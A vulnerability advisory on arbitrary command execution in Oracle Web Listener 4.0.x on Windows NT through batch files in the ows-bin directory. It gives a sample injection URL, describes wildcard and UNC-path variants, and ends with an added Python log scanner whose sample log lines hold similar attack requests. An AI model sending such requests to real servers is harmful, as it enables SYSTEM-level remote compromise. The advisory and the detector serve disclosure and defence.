COMMAND
Oracle
SYSTEMS AFFECTED
Oracle Web Listener 4.0.x on Windows NT
PROBLEM
The following is based on Cerberus Information Security Advisory
(CISADV000315). The Cerberus Security Team has discovered a
number of issues with Oracle's Web Listener, part of the Oracle
Application Server, that can allow a remote attacker to run
arbitrary commands on the web server.
Part of the problem is caused by default settings after OAS has
been installed. The "ows-bin" virtual directory on an Oracle Web
Listener is the equivalent of the "cgi-bin" on other web servers
and by default this is set to C:\orant\ows\4.0\bin - this
directory not only contains a number of batch files, DLLs and
executables but also the binary image file for the Listener
itself. Even if this default setting has been changed, however,
you may still be at risk if there are batch files in the new
"ows-bin" directory.
The Oracle Web Listener will execute batch files as CGI scripts
and by making a request to a batch file that requires one or more
arguments it is possible to execute any command the attacker
wants by building a special query string. For example the
following will give a directory listing:
http://charon/ows-bin/perlidlc.bat?&dir
It is even possible to use UNC paths so the Listener will connect
to the remote machine over NBSession, download the executable and
then execute it.
By default the Web Listener process runs in the security context
of SYSTEM, so any commands issued by an attacker will run with
SYSTEM privileges.
Another problem is that the Listener will expand the "*" character,
so even if the attacker doesn't know the name of a real batch file
in "ows-bin" they can request *.bat?&command.
Some of the executables in the default directory allow attackers
to kill services, return configuration information and cause
other undesirable events to occur.
SOLUTION
Due to the severity of this problem Cerberus recommends that the
following be actioned immediately. If "ows-bin" is the default
then using the Oracle Application Server Manager remove the
ows-bin virtual directory or point it to a more benign directory.
If "ows-bin" is not the default then verify that there are no
batch files in this directory. A check for this has been added
to Cerberus' security scanner, CIS, available from their website.
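A defender-side log check, added here as an example and not part of the Cerberus advisory or of the CIS scanner: it flags requests that match the shape described above (a batch file under ows-bin, a query string beginning with "&", the "*" wildcard, a UNC path in the query). The log lines are constructed, and common log format is assumed; the Oracle Web Listener's own log layout may differ, so adapt REQUEST_RE if needed.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (common log format assumed; not real
# Oracle Web Listener output). The third line carries a UNC path.
SAMPLE_LOG = r"""
10.0.0.5 - - [16/Mar/2000:10:01:02 +0000] "GET /ows-bin/perlidlc.bat?&dir HTTP/1.0" 200 512
10.0.0.5 - - [16/Mar/2000:10:01:09 +0000] "GET /ows-bin/*.bat?&dir HTTP/1.0" 200 300
10.0.0.7 - - [16/Mar/2000:10:02:11 +0000] "GET /ows-bin/perlidlc.bat?&\\10.0.0.7\share\x.exe HTTP/1.0" 200 100
10.0.0.9 - - [16/Mar/2000:10:03:00 +0000] "GET /ows-bin/oraweb.dll?session=1 HTTP/1.0" 200 2048
10.0.0.9 - - [16/Mar/2000:10:03:05 +0000] "GET /index.html HTTP/1.0" 200 1024
"""

# Pulls method and request target out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return the reasons a request target matches the advisory's pattern.

    An empty list means the request does not touch a script under ows-bin
    in a way the advisory describes.
    """
    target = unquote(target)                  # undo %xx encoding first
    path, _, query = target.partition("?")
    if "/ows-bin/" not in path.lower():
        return []
    reasons = []
    # .bat and .cmd are both executed as batch files on Windows NT.
    if path.lower().endswith((".bat", ".cmd")):
        reasons.append("batch file requested via ows-bin")
    if "*" in path:
        reasons.append("wildcard in script name (Listener expands '*')")
    if query.startswith("&"):
        reasons.append("query string starts with '&' (argument injection)")
    if "\\\\" in query:
        reasons.append("UNC path in query string")
    return reasons


def scan_log(text):
    """Return (target, reasons) for every log line that matches."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            reasons = classify_request(m.group("target"))
            if reasons:
                hits.append((m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
```

On a live system the same classifier can run over the Listener's access log on a schedule, and any hit is a prompt to re-check the ows-bin mapping as the SOLUTION section describes.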